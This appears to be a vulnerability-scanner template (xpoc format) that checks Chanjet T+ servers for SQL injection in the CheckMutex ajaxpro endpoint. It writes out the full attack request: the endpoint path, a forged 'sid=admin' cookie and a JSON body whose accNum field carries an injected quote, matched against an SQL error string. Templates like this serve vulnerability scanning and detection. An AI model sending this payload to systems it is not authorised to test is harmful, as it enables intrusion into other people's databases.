id: chanjet-tplus-checkmutex-sqli

info:
  name: Chanjet Tplus CheckMutex SQL Injection
  author: xpoc
  severity: high
  verified: false
  tags: chanjet,tplus,sqli
  created: 2023/06/22

set:
  rand: randomInt(5,10)
rules:
  r0:
    request:
      method: POST
      path: /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex
      headers:
        Host: 127.0.0.1
        Cookie: ASP.NET_SessionId=; sid=admin
        Content-Type: text/plain
      body: |
        {"accNum": "{{rand}}'", "functionTag": "SYS0104", "url": ""}
    expression: response.body.bcontains(b'order by begintime')
expression: r0()